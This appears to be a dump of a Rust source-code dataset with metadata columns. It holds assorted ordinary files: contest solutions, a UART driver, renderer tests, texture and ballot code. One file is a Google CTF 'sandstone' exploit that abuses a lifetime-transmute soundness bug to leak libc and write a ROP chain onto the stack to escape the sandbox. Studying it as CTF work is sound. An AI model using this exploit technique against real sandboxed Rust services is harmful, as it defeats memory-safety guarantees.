blob_id
stringlengths
40
40
language
stringclasses
1 value
repo_name
stringlengths
5
140
path
stringlengths
5
183
src_encoding
stringclasses
6 values
length_bytes
int64
12
5.32M
score
float64
2.52
4.94
int_score
int64
3
5
detected_licenses
listlengths
0
47
license_type
stringclasses
2 values
text
stringlengths
12
5.32M
download_success
bool
1 class
4c6a1285af8a12d4563168774e4ae4a31d4669a9
Rust
lucifer1004/AtCoder
/abc189/src/bin/b.rs
UTF-8
342
2.734375
3
[]
no_license
use proconio::input; fn main() { input! { n: usize, mut x: usize, liquor: [(usize, usize); n], } x *= 100; let mut tot = 0; for i in 0..n { tot += liquor[i].0 * liquor[i].1; if tot > x { println!("{}", i + 1); return; } } println!("-1"); }
true
9f1e0ca737b58cb698026c14aba7dfb6a072f6d0
Rust
yoava333/ctf-writeups
/googlectf_quals/2019/sandstone/ex.rs
UTF-8
4,187
2.8125
3
[]
no_license
{ use std::io; use std::io::prelude::*; trait A { fn my_func(&self) -> &mut [u64]; } struct B { b: u64, } struct C { c: u64, } impl A for B { fn my_func(&self) -> &mut [u64] { get_dangling() } } impl A for C { fn my_func(&self) -> &mut [u64] { get_dangling() } } fn is_prime(a: u64) -> bool { if a < 2 { return false; } if a % 2 == 0 { return true; } for i in 3..a { if a % i == 0 { return false; } } true } fn get_trait_a() -> Box<dyn A> { let n = if let Ok(args) = std::env::var("CARGO_EXTRA_ARGS") { args.len() as usize } else { 791913 }; if is_prime(n as u64) { Box::new(B { b: 0 }) } else { Box::new(C { c: 0 }) } } trait Object { type Output; } impl<T: ?Sized> Object for T { type Output = &'static mut [u64]; } fn foo<'a, T: ?Sized>(x: <T as Object>::Output) -> &'a mut [u64] { x } fn transmute_lifetime<'a, 'b>(x: &'a mut [u64]) -> &'b mut [u64] { foo::<dyn Object<Output = &'a mut [u64]>>(x) } // And yes this is a genuine `transmute_lifetime` fn get_dangling<'a>() -> &'a mut [u64] { io::stdout().write(b"hello\n"); let mut a: [u64; 128] = [0; 128]; let mut x = 0; transmute_lifetime(&mut a) } fn my_print_str(s: &str) { io::stdout().write(s.as_bytes()); } fn my_print(n: u64) { let s: String = n.to_string() + "\n"; io::stdout().write(s.as_bytes()); } // This function is only used to raise the stack frame and allow the dangling // slice to overwrite the stack frame of low stack frames. fn rec(a: &mut [u64], b: &mut [u64], attack: &mut [u64], n: u64, lib_c: u64) { let mut array: [u64; 3] = [0; 3]; a[0] += 1; b[0] += 1; array[0] = a[0] + 1; array[1] = a[0] + b[1] + 1; if a[0] > n { // ubuntu 19.04 let pop_rax_ret = lib_c + 0x0000000000047cf8; let syscall_inst = lib_c + 0x0000000000026bd4; let ret = lib_c + 0x026422; // Overwrite the stack with ret slide for (j, el) in attack.iter_mut().enumerate() { *el = ret; } // Write our small rop chain let x = 50; attack[x] = pop_rax_ret; attack[x + 1] = 0x1337; attack[x + 2] = syscall_inst; // Trigger return; } // Random calculation to kill compiler optimizations. if a[0] > 30 { b[0] = a[0] + a[1]; rec(b, &mut array, attack, n, lib_c); } else { b[1] = a[2] + a[0]; rec(&mut array, a, attack, n, lib_c); } } // using external variables to kill compiler optimizations let n = if let Ok(args) = std::env::var("BLA") { args.len() as usize } else { 30 }; // using external variables to kill compiler optimizations let n2 = if let Ok(args) = std::env::var("BLA") { 10 } else { 100 }; // Using the dyn trait so that the compiler will execute the // get_dangling function in a higher stack frame. let my_a = get_trait_a(); // getting the random stack let mut r = my_a.my_func(); // Just random content let mut v: Vec<u64> = Vec::with_capacity(n); v.push(1); v.push(1); v.push(1); // Adding some content; let mut b: Vec<u64> = Vec::with_capacity(n); b.push(1); b.push(2); b.push(3); // We need to write output buffers to get lib-c gadgets my_print_str("Give me gadegts\n"); let lib_c_addr = r[62]; let lib_c = lib_c_addr - 628175; my_print_str("===============\nlib_c base = "); my_print(lib_c); my_print_str("===============\n"); // Exploit rec(&mut v, &mut b, r, n2, lib_c); }
true
48e43606ab657088197690c51f5fca784a0b3442
Rust
prabhugopal/Sprocket
/src/uart.rs
UTF-8
2,116
2.796875
3
[ "MIT" ]
permissive
use x86::shared::io; use traps; use picirq; use core::sync::atomic::{AtomicBool, Ordering}; const COM1: u16 = 0x3f8; static UART_INITIALIZED: AtomicBool = AtomicBool::new(false); pub struct Uart; impl Uart { pub fn new() -> Result<Uart, ()> { // Consume token and init the UART (if present) if !UART_INITIALIZED.load(Ordering::SeqCst) { UART_INITIALIZED.store(true, Ordering::SeqCst); unsafe { Self::init() } } else { Err(()) } } unsafe fn init() -> Result<Uart, ()> { // unsafe because port I/O is hideously unsafe and a misconfigured PIC is bad // we may be able to leverage better abstractions though // see: http://www.randomhacks.net/2015/11/16/bare-metal-rust-configure-your-pic-interrupts/ io::outb(COM1, 0); io::outb(COM1 + 3, 0x80); // Unlock divisor io::outb(COM1, (115200u32 / 9600u32) as u8); io::outb(COM1 + 1, 0); io::outb(COM1 + 3, 0x03); // Lock divisor, 8 data bits. io::outb(COM1 + 4, 0); io::outb(COM1 + 1, 0x01); // Enable receive interrupts. // If status is 0xFF, no serial port. if io::inb(COM1 + 5) == 0xFF { return Err(()); } // Acknowledge pre-existing interrupt conditions; // enable interrupts. io::inb(COM1 + 2); io::inb(COM1); picirq::PIC.lock().enable_irq(traps::COM1_IRQ as u32); /* // Announce that we're here. for(p="xv6...\n"; *p; p++) { uartputc(*p); } */ Ok(Uart {}) } pub fn write_byte(&mut self, c: u8) { unsafe { for _ in 0..128 { if io::inb(COM1 + 5) & 0x20 != 0 { break; } } io::outb(COM1, c); } } fn microdelay(_: i32) {} pub fn read_byte(&mut self) -> Option<u8> { unsafe { if (io::inb(COM1 + 5) & 0x01) == 0 { None } else { Some(io::inb(COM1)) } } } }
true
704e216fb72fc3487bfcd276ed9354ffbca54642
Rust
Antiarchitect/rust_rectangle
/src/main.rs
UTF-8
1,597
4.03125
4
[]
no_license
trait TraitPoint { fn new(x: f64, y: f64) -> Self; fn x(&self) -> &f64; fn y(&self) -> &f64; fn distance_to(&self, other: &Self) -> f64 { ((*other.x() - *self.x()).powi(2) + (*other.y() - *self.y()).powi(2)).sqrt() } } struct Point { x: f64, y: f64 } impl TraitPoint for Point { fn new(x: f64, y: f64) -> Self { Point { x: x, y: y } } fn x(&self) -> &f64 { &self.x } fn y(&self) -> &f64 { &self.y } } trait TraitRectangle<'a> { type Point: TraitPoint; fn new(topleft: &'a Self::Point, bottomright: &'a Self::Point) -> Self; fn topleft(&self) -> &Self::Point; fn bottomright(&self) -> &Self::Point; fn height(&self) -> f64 { (*self.topleft().y() - *self.bottomright().y()).abs() } fn width(&self) -> f64 { (*self.topleft().x() - *self.bottomright().x()).abs() } fn area(&self) -> f64 { (self.height() * self.width()) } } struct Rectangle<'a> { tl: &'a Point, br: &'a Point } impl<'a> TraitRectangle<'a> for Rectangle<'a> { type Point = Point; fn new(topleft: &'a Point, bottomright: &'a Point) -> Rectangle<'a> { Rectangle { tl: topleft, br: bottomright } } fn topleft(&self) -> &Point { self.tl } fn bottomright(&self) -> &Point { self.br } } fn main() { let tl_p = Point::new(1.1, 2.2); let br_p = Point::new(3.3, 4.4); let rect = Rectangle::new(&tl_p, &br_p); println!("Width: {}", rect.width()); println!("Height: {}", rect.height()); println!("AREA: {}", rect.area()); }
true
064957fb38024e382dda62595bef0f6adf8f8d3c
Rust
igowen/dashing
/src/graphics/render/tests.rs
UTF-8
8,966
2.90625
3
[ "LicenseRef-scancode-generic-cla", "Apache-2.0" ]
permissive
// Copyright 2018 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #[cfg(test)] // The output of the renderer is intended to be pixel-perfect, so the tests are written with // that in mind. use image; use png; use super::*; use crate::resources::color::Palette; /// There's a lot of boilerplate in setting up the offscreen renderer and extracting the rendered /// image, so we use a separate support fixture to manage that. struct RenderTestFixture { renderer: Renderer, sprite_width: u32, sprite_height: u32, width: u32, height: u32, } impl RenderTestFixture { fn new(width: u32, height: u32) -> RenderTestFixture { // Load the test sprite texture. // TODO: get rid of this once the sprite-loading code is done. let img = include_bytes!("testdata/12x12.png"); let mut decoder = png::Decoder::new(&img[..]); // Need to set this so the index values don't get converted to RGBA. decoder.set_transformations(png::Transformations::IDENTITY); let mut reader = decoder.read_info().unwrap(); let mut imgdata = vec![0u8; reader.output_buffer_size()]; reader.next_frame(&mut imgdata[..]).unwrap(); let tex = SpriteTexture::new_from_pixels( &imgdata[..], reader.info().size().0 as usize, reader.info().size().1 as usize, reader.info().size().0 as usize / 16, reader.info().size().1 as usize / 16, 256, ) .unwrap(); let sprite_width = tex.sprite_width(); let sprite_height = tex.sprite_height(); let renderer = Renderer::new( None, (width, height), &tex, [0, 255, 0].into(), wgpu::FilterMode::Nearest, wgpu::PresentMode::Fifo, ) .unwrap(); RenderTestFixture { renderer, width, height, sprite_width: sprite_width as u32, sprite_height: sprite_height as u32, } } /// Extract the rendered image from the offscreen context. fn extract_render_result(&mut self) -> Box<[u8]> { self.renderer.fetch_render_output().unwrap() } } #[test] fn render_one_cell() { let actual_image = { let mut fixture = RenderTestFixture::new(1, 1); fixture.renderer.update( [SpriteCell { palette: Palette::mono([255, 255, 255]).set(0, [0, 0, 0]), sprite: 1, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/one_cell.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn render_one_cell_sprite_change() { let mut fixture = RenderTestFixture::new(1, 1); fixture.renderer.update( [SpriteCell { palette: Palette::mono([255, 255, 0]).set(0, [0, 0, 0]), sprite: 2, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); let actual_image = fixture.extract_render_result(); let expected_image = image::load_from_memory(include_bytes!("testdata/one_cell.png")) .unwrap() .to_rgba8() .into_raw(); // These shouldn't match. assert_ne!(&actual_image[..], &expected_image[..]); fixture.renderer.update( [SpriteCell { palette: Palette::mono([255, 255, 255]).set(0, [0, 0, 0]), sprite: 1, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); let actual_image_2 = fixture.extract_render_result(); // These should. assert_eq!(&actual_image_2[..], &expected_image[..]); } #[test] fn render_2x2_with_color() { let actual_image = { let mut fixture = RenderTestFixture::new(2, 2); fixture.renderer.update( [ SpriteCell { palette: Palette::mono([255, 0, 255]).set(0, [0, 0, 0]), sprite: 72, ..Default::default() }, SpriteCell { palette: Palette::mono([0, 255, 255]).set(0, [0, 0, 0]), sprite: 105, ..Default::default() }, SpriteCell { palette: Palette::mono([255, 255, 0]).set(0, [0, 0, 0]), sprite: 33, ..Default::default() }, SpriteCell { palette: Palette::mono([0, 255, 0]).set(0, [0, 0, 0]), sprite: 19, ..Default::default() }, ] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/hi.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(actual_image.len(), expected_image.len()); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn gray() { let actual_image = { let mut fixture = RenderTestFixture::new(1, 1); fixture.renderer.update( [SpriteCell { palette: Palette::mono([128, 128, 128]), sprite: 0, ..Default::default() }] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/50pct_gray.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn big() { let actual_image = { let mut fixture = RenderTestFixture::new(680, 10); fixture.renderer.update( vec![ SpriteCell { palette: Palette::mono([128, 128, 128]).set(1, [255, 0, 0]), sprite: 1, ..Default::default() }; 6800 ] .iter(), ); // Render the frame. fixture.renderer.render_frame().unwrap(); fixture.extract_render_result() }; let expected_image = image::load_from_memory(include_bytes!("testdata/big.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); } #[test] fn full_palette() { let img = include_bytes!("testdata/full_palette.png"); let mut decoder = png::Decoder::new(&img[..]); // Need to set this so the index values don't get converted to RGBA. decoder.set_transformations(png::Transformations::IDENTITY); let mut reader = decoder.read_info().unwrap(); let mut imgdata = vec![0u8; reader.output_buffer_size()]; reader.next_frame(&mut imgdata[..]).unwrap(); let tex = SpriteTexture::new_from_pixels( &imgdata[..], reader.info().size().0 as usize, reader.info().size().1 as usize, reader.info().size().0 as usize, reader.info().size().1 as usize, 1, ) .unwrap(); let actual_image = { let mut renderer = Renderer::new( None, (1, 1), &tex, [0, 255, 0].into(), wgpu::FilterMode::Nearest, wgpu::PresentMode::Fifo, ) .unwrap(); renderer.update( vec![ SpriteCell { palette: Default::default(), sprite: 0, ..Default::default() }; 1 ] .iter(), ); // Render the frame. renderer.render_frame().unwrap(); renderer.fetch_render_output().unwrap() }; let expected_image = image::load_from_memory(include_bytes!("testdata/full_palette_output.png")) .unwrap() .to_rgba8() .into_raw(); assert_eq!(&actual_image[..], &expected_image[..]); }
true
73f84c991b2218155e097afeed0b7456fc039c2c
Rust
willdoescode/william_lane_connect_four
/src/tests/test_new.rs
UTF-8
276
2.703125
3
[]
no_license
use crate::*; use std::io::stdout; #[test] fn test_new() { let board = Game::new(); let normal = Game { count: [6; 7], board: [['-'; 7]; 6], player: 'O', moves: 0, stdout: stdout(), }; assert_eq!(board.display_board(), normal.display_board()); }
true
f46495786d14b20877fd97a8fb13c019aefe18c2
Rust
trevday/rust-raytracer
/src/texture.rs
UTF-8
4,305
2.75
3
[]
no_license
use crate::base::BasicTwoTuple; use crate::color::RGB; use crate::point::Point3; use crate::utils::{clamp, noise, turbulence}; use image::{DynamicImage, GenericImageView}; use serde::Deserialize; use std::{convert::TryFrom, ops, sync::Arc}; #[derive(Deserialize)] pub struct TexCoord(pub BasicTwoTuple<f32>); impl Copy for TexCoord {} impl Clone for TexCoord { fn clone(&self) -> TexCoord { *self } } impl TexCoord { pub fn new(x: f32, y: f32) -> TexCoord { TexCoord(BasicTwoTuple::new(x, y)) } pub fn u(&self) -> f32 { self.0.x } pub fn v(&self) -> f32 { self.0.y } pub fn clamp_to_valid_coords(&self) -> TexCoord { TexCoord::new( clamp(self.u(), 0.0_f32, 1.0_f32), clamp(self.v(), 0.0_f32, 1.0_f32), ) } } impl ops::Add for TexCoord { type Output = TexCoord; fn add(self, rhs: TexCoord) -> TexCoord { TexCoord(self.0.add(rhs.0)) } } impl ops::Sub for TexCoord { type Output = TexCoord; fn sub(self, rhs: TexCoord) -> TexCoord { TexCoord(self.0.sub(rhs.0)) } } impl ops::Mul<f32> for TexCoord { type Output = TexCoord; fn mul(self, rhs: f32) -> TexCoord { TexCoord(self.0.mul(rhs)) } } pub trait Texture { fn value(&self, uv: &TexCoord, p: &Point3) -> RGB; fn bump_value(&self, uv: &TexCoord, p: &Point3) -> f32 { let bump = self.value(uv, p); (bump.r() + bump.g() + bump.b()) / 3.0_f32 } } pub type SyncTexture = dyn Texture + Send + Sync; #[derive(Deserialize)] pub struct Constant { color: RGB, } impl Texture for Constant { fn value(&self, _uv: &TexCoord, _p: &Point3) -> RGB { self.color } } pub struct Test; impl Texture for Test { fn value(&self, uv: &TexCoord, _p: &Point3) -> RGB { RGB::new( uv.u(), uv.v(), if 1.0_f32 - uv.u() - uv.v() < 0.0_f32 { 0.0_f32 } else { 1.0_f32 - uv.u() - uv.v() }, ) } } pub struct Checker { repeat: f32, odd: Arc<SyncTexture>, even: Arc<SyncTexture>, } impl Checker { pub fn new(repeat: f32, odd: Arc<SyncTexture>, even: Arc<SyncTexture>) -> Checker { Checker { repeat: repeat, odd: odd, even: even, } } } impl Texture for Checker { fn value(&self, uv: &TexCoord, p: &Point3) -> RGB { let sines = (self.repeat * p.x()).sin() * (self.repeat * p.y()).sin() * (self.repeat * p.z()).sin(); if sines < 0.0_f32 { self.odd.value(uv, p) } else { self.even.value(uv, p) } } } pub struct Image { img: Arc<DynamicImage>, } impl Image { pub fn new(img: Arc<DynamicImage>) -> Image { Image { img: img } } } impl Texture for Image { fn value(&self, uv: &TexCoord, _p: &Point3) -> RGB { let i = (uv.u() * self.img.width() as f32) as u32 % self.img.width(); let j = ((1_f32 - uv.v()) * self.img.height() as f32) as u32 % self.img.height(); let pixel = self.img.get_pixel(i, j); RGB::new( pixel[0] as f32 / 255_f32, pixel[1] as f32 / 255_f32, pixel[2] as f32 / 255_f32, ) .inverse_gamma_correct() } } #[derive(Deserialize)] pub struct Noise { scale: f32, } impl Texture for Noise { fn value(&self, _uv: &TexCoord, p: &Point3) -> RGB { return RGB::new(0.5_f32, 0.5_f32, 0.5_f32) * (1.0_f32 + noise(&(*p * self.scale))); } } #[derive(Deserialize)] pub struct Turbulence { scale: f32, depth: u32, omega: Omega, } #[derive(Deserialize)] #[serde(try_from = "f32")] struct Omega(f32); impl TryFrom<f32> for Omega { type Error = &'static str; fn try_from(v: f32) -> Result<Self, Self::Error> { if v > 1.0_f32 { Err("Turbulence omega is greater than 1.") } else if v < 0.0_f32 { Err("Turbulence omega is less than 0.") } else { Ok(Omega(v)) } } } impl Texture for Turbulence { fn value(&self, _uv: &TexCoord, p: &Point3) -> RGB { return RGB::new(1.0_f32, 1.0_f32, 1.0_f32) * turbulence(&(*p * self.scale), self.depth, self.omega.0); } }
true
19b125e1f1a82c774884c64a43c3f22c618581d4
Rust
Henning-K/exercism-tasks
/queen-attack/src/lib.rs
UTF-8
634
3.578125
4
[]
no_license
pub struct ChessPosition { x: i32, y: i32, } pub struct Queen { pos: ChessPosition, } impl ChessPosition { pub fn new(x: i32, y: i32) -> Result<Self, String> { if x < 0 || y < 0 || x > 7 || y > 7 { return Err("Invalid Position".to_string()); } Ok(ChessPosition { x: x, y: y }) } } impl Queen { pub fn new(cp: ChessPosition) -> Self { Queen { pos: cp } } pub fn can_attack(&self, other: &Self) -> bool { self.pos.x == other.pos.x || self.pos.y == other.pos.y || ((self.pos.x - other.pos.x) / (self.pos.y - other.pos.y)).abs() == 1 } }
true
1dc92434201ac9796a74de289c7fd1fa7a99ecca
Rust
mdaffin/adventofcode
/2017/src/lib.rs
UTF-8
934
2.890625
3
[ "MIT" ]
permissive
extern crate failure; #[macro_use] extern crate failure_derive; use std::path::Path; use std::fs::File; use std::str::FromStr; use std::io::{self, BufReader, Read}; #[derive(Fail, Debug)] pub enum ParsePartError { #[fail(display = "{} is not a valid part.", _0)] InvalidPartNumber(String), } pub enum Part { One, Two, } impl FromStr for Part { type Err = ParsePartError; fn from_str(s: &str) -> Result<Self, ParsePartError> { match s.as_ref() { "1" | "one" => Ok(Part::One), "2" | "two" => Ok(Part::Two), i => Err(ParsePartError::InvalidPartNumber(i.to_string())), } } } pub fn input_reader<P>(filename: P) -> Result<BufReader<Box<Read>>, io::Error> where P: AsRef<Path> { Ok(if filename.as_ref() == Path::new("-") { BufReader::new(Box::new(io::stdin())) } else { BufReader::new(Box::new(File::open(filename)?)) }) }
true
29ad69dc37b6912d69dc4e3a8b6dae920a0cf9f8
Rust
joelverhagen/adventofcode
/2017/rust/day8/src/main.rs
UTF-8
3,709
3.65625
4
[]
no_license
use std::fs::File; use std::io::BufRead; use std::io::BufReader; use std::collections::HashMap; #[derive(Debug)] enum Operator { LessThan, LessThanOrEqual, GreaterThan, GreaterThanOrEqual, Equal, NotEqual, } #[derive(Debug)] struct Condition { register: String, operator: Operator, value: i32, } #[derive(Debug)] struct Instruction { register: String, increase: bool, value: i32, condition: Condition, } fn parse_instruction(line: &str) -> Instruction { let pieces: Vec<&str> = line.split_whitespace().collect(); let register = String::from(pieces[0]); let increase = match pieces[1] { "inc" => true, "dec" => false, _ => panic!("Expected 'inc' or 'dec'."), }; let value = pieces[2].parse::<i32>().expect("Could not parse instruction value as i32."); let condition_register = String::from(pieces[4]); let condition_operator = match pieces[5] { "<" => Operator::LessThan, "<=" => Operator::LessThanOrEqual, ">" => Operator::GreaterThan, ">=" => Operator::GreaterThanOrEqual, "==" => Operator::Equal, "!=" => Operator::NotEqual, _ => panic!("Unexpected condition operator."), }; let condition_value = pieces[6].parse::<i32>().expect("Could not parse condition value as i32."); Instruction { register, increase, value, condition: Condition { register: condition_register, operator: condition_operator, value: condition_value, }, } } fn parse_file(file_name: &str) -> Vec<Instruction> { let f = File::open(file_name).expect("Could not open the specified file."); let reader = BufReader::new(f); reader .lines() .map(|lr| lr.expect("Could not read a line.")) .map(|l| parse_instruction(&l)) .collect() } fn process_instructions(instructions: &Vec<Instruction>) -> (HashMap<&str, i32>, i32) { let mut registers: HashMap<&str, i32> = HashMap::new(); let mut max = 0; for instruction in instructions { let current = *registers.entry(&instruction.condition.register).or_insert(0); let condition_satisfied = match instruction.condition.operator { Operator::LessThan => current < instruction.condition.value, Operator::LessThanOrEqual => current <= instruction.condition.value, Operator::GreaterThan => current > instruction.condition.value, Operator::GreaterThanOrEqual => current >= instruction.condition.value, Operator::Equal => current == instruction.condition.value, Operator::NotEqual => current != instruction.condition.value, }; if !condition_satisfied { continue; } let delta = match instruction.increase { true => instruction.value, false => -1 * instruction.value, }; let entry = registers.entry(&instruction.register).or_insert(0); *entry += delta; let new_value = *entry; if new_value > max { max = new_value; } } (registers, max) } fn get_largest_register_value(registers: &HashMap<&str, i32>) -> i32 { *registers .iter() .map(|(_, v)| v) .max() .unwrap_or(&0) } fn main() { let file_name = "input.txt"; let instructions = parse_file(file_name); let (registers, largest_value) = process_instructions(&instructions); println!("Day 8, part 1: {}", get_largest_register_value(&registers)); println!("Day 8, part 2: {}", largest_value); }
true
498b83dfc3d09ea4beeed66df0843d09448d0000
Rust
Geraet/kompositum-rs
/src/tests.rs
UTF-8
787
2.546875
3
[ "MIT" ]
permissive
// Copyright(c) 2021 René Hansen. // Distributed under the MIT License (http://opensource.org/licenses/MIT) #[cfg(test)] mod tests { use crate::{builder, printer::Printer, IDType}; use multimap::MultiMap; const TREE_MAP_DEF: &[(IDType, IDType)] = &[(1, 2), (1, 3), (1, 4), (4, 5), (4, 6), (1, 7)]; #[test] fn test_from_builder() { let tree_map: MultiMap<IDType, IDType> = TREE_MAP_DEF.iter().cloned().collect(); let root = builder::build_composite(1, &tree_map); root.accept(&mut Printer::new()); } #[test] fn test_component_debug_print() { let tree_map: MultiMap<IDType, IDType> = TREE_MAP_DEF.iter().cloned().collect(); let root = builder::build_composite(1, &tree_map); println!("{:?}", &root); } }
true
afdba96152f21bbc30e902012dc5cb7fb547977e
Rust
Logicalshift/flowbetween
/animation/src/storage/storage_error.rs
UTF-8
326
2.78125
3
[ "Apache-2.0" ]
permissive
/// /// Errors from the storage API /// #[derive(Clone, Debug, PartialEq, Serialize, Deserialize)] pub enum StorageError { /// General failure General, /// The storage could not be initialised FailedToInitialise, /// The storage cannot continue because of an eariler error CannotContinueAfterError }
true
6b560be340c378479745eb241cf77d06fea6bf2f
Rust
cryptoballot/cryptoballot
/cryptoballot/src/ballot.rs
UTF-8
10,078
3.265625
3
[]
no_license
use indexmap::IndexMap; use prost::Message; #[derive(Serialize, Deserialize, Debug, Clone)] pub struct Ballot { pub id: String, pub contests: Vec<u32>, // List of contest indexes /// Application specific properties. /// /// Hashmaps are not allowed because their unstable ordering leads to non-determinism. #[serde(default)] #[serde(skip_serializing_if = "IndexMap::is_empty")] pub properties: IndexMap<String, serde_json::Value>, } #[derive(Serialize, Deserialize, Debug, Clone)] pub struct Contest { pub id: String, pub index: u32, pub contest_type: ContestType, pub num_winners: u32, pub write_in: bool, pub candidates: Vec<Candidate>, /// Application specific properties. /// /// Hashmaps are not allowed because their unstable ordering leads to non-determinism. #[serde(default)] #[serde(skip_serializing_if = "IndexMap::is_empty")] pub properties: IndexMap<String, serde_json::Value>, } #[derive(Serialize, Deserialize, Debug, Clone)] pub struct Candidate { pub id: String, /// Application specific properties. /// /// Hashmaps are not allowed because their unstable ordering leads to non-determinism. #[serde(default)] #[serde(skip_serializing_if = "IndexMap::is_empty")] pub properties: IndexMap<String, serde_json::Value>, } #[derive(Serialize, Deserialize, Debug, Clone)] #[serde(rename_all = "snake_case")] pub enum ContestType { /// Plurality voting is an electoral system in which each voter is allowed to vote for only one candidate and the candidate /// who polls the most among their counterparts (a plurality) is elected. It may be called first-past-the-post (FPTP), /// single-choice voting, simple plurality, or relative/simple majority. /// /// For Plurality tally, `Selection.score` has no meaning. Plurality, /// Score voting or “range voting” is an electoral system in which voters give each candidate a score, the scores are summed, /// and the candidate with the highest total is elected. It has been described by various other names including “evaluative voting”, /// “utilitarian voting”, and “the point system”. /// /// For Score tally, `Selection.score` represents the number of points assigned to each candidate. Zero is the worst score that can be asssigned to a candidate. Score, /// Approval voting is a single-winner electoral system where each voter may select (“approve”) any number of candidates. /// The winner is the most-approved candidate. /// /// For Approval tally, `Selection.score` has no meaning. Approval, /// The Condorcet method is a ranked-choice voting system that elects the candidate that would win a majority of the vote in all of the head-to-head elections against each of the other candidates. /// The Condorcet method isn’t guarunteed to produce a single-winner due to the non-transitive nature of group choice. /// /// For Condorcet tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. Condorcet, /// The standard Borda count where each candidate is assigned a number of points equal to the number of candidates ranked lower than them. /// It is known as the "Starting at 0" Borda count since the least-significantly ranked candidate is given zero points. /// Each candidate is given points according to: /// /// ```number-candidates - candidate-position - 1``` /// /// Example point allocation for a single ballot: /// /// | Position on ballot | Candiate | Points | /// | --------------------|----------|--------| /// | 0 | Alice | 3 | /// | 1 | Bob | 2 | /// | 2 | Carlos | 1 | /// | 3 | Dave | 0 | /// /// For Borda tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. Borda, /// The classic Borda count as defined in Jean-Charles de Borda's [original proposal](http://gerardgreco.free.fr/IMG/pdf/MA_c_moire-Borda-1781.pdf). /// It is known as the "Starting at 1" Borda count since the least-significantly ranked candidate is given one point. /// Each candidate is given points according to: /// /// ```number-candidates - candidate-position``` /// /// Example point allocation for a single ballot: /// /// | Position on ballot | Candiate | Points | /// | --------------------|----------|--------| /// | 0 | Alice | 4 | /// | 1 | Bob | 3 | /// | 2 | Carlos | 2 | /// | 3 | Dave | 1 | /// /// For BordaClassic tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. BordaClassic, /// In the Dowdall system, the highest-ranked candidate obtains 1 point, while the 2nd-ranked candidate receives ½ a point, the 3rd-ranked candidate receives ⅓ of a point, etc. /// An important difference of this method from the others is that the number of points assigned to each preference does not depend on the number of candidates. /// Each candidate is given points according to: /// /// ```1 / (candidate-position + 1)``` /// /// If Dowdall is selected, tallystick will panic if an integer count type is used in the tally. This variant should only be used with a float or rational tally. /// /// Example point allocation for a single ballot: /// /// | Position on ballot | Candiate | Points | /// | --------------------|----------|--------| /// | 0 | Alice | 1 | /// | 1 | Bob | ½ | /// | 2 | Carlos | ⅓ | /// | 3 | Dave | ¼ | /// /// For BordaDowdall tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. BordaDowdall, /// In a modified Borda count, the number of points given for a voter's first and subsequent preferences is determined by the total number of candidates they have actually ranked, rather than the total number listed. /// This is to say, typically, on a ballot of `n` candidates, if a voter casts only `m` preferences (where `n ≥ m ≥ 1`), a first preference gets `m` points, a second preference `m – 1` points, and so on. /// Modified Borda counts are used to counteract the problem of [bullet voting](https://en.wikipedia.org/wiki/Bullet_voting). /// Each candidate is given points according to: /// /// ```number-marked - candidate-position``` /// /// For BordaModifiedClassic tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. BordaModifiedClassic, /// The Schulze method is an voting system that selects a single winner using votes that express preferences. /// In SchulzeWinning Strength of a link is measured by its support. You should use this Schulze variant if you are unsure. /// /// For SchulzeWinning tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. SchulzeWinning, /// The Schulze method is an voting system that selects a single winner using votes that express preferences. /// In SchulzeRatio, the strength of a link is measured by the difference between its support and opposition. /// /// For SchulzeRatio tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. SchulzeRatio, /// The Schulze method is an voting system that selects a single winner using votes that express preferences. /// In SchulzeMargin, the strength of a link is measured by the ratio of its support and opposition. /// /// For SchulzeMargin tally, `Selection.score` is interpreted as the candidate rank, where the best ranked candidate has a rank of zero. /// Candidates that have the same rank are considered to be of equal preference. SchulzeMargin, } #[derive(Serialize, Deserialize, Clone, Message, PartialEq, Eq)] pub struct Selection { /// true if the `selection` field is a free-form write-in, false if the `selection` field corresponds to a known candidate-id #[prost(bool)] #[serde(default)] pub write_in: bool, /// Score has different meanings depending on the tally type: /// STV, Condorcet, Borda and Schulze: `score` means candidate rank, where a zero is the best rank that can be assigned to a candidate. /// Score: `score` is the points assinged to this candidate. Zero is the worst score that can be asssigned to a candidate. /// Plurality, Approval, and InstantRunoff: `score` is meaningless and has no effect. #[prost(uint32)] #[serde(default)] pub score: u32, /// Known candidate-id or free-form text, depending on the value of the `write_in` field. #[prost(string)] pub selection: String, } impl Into<(String, u64)> for Selection { fn into(self) -> (String, u64) { (self.selection, self.score as 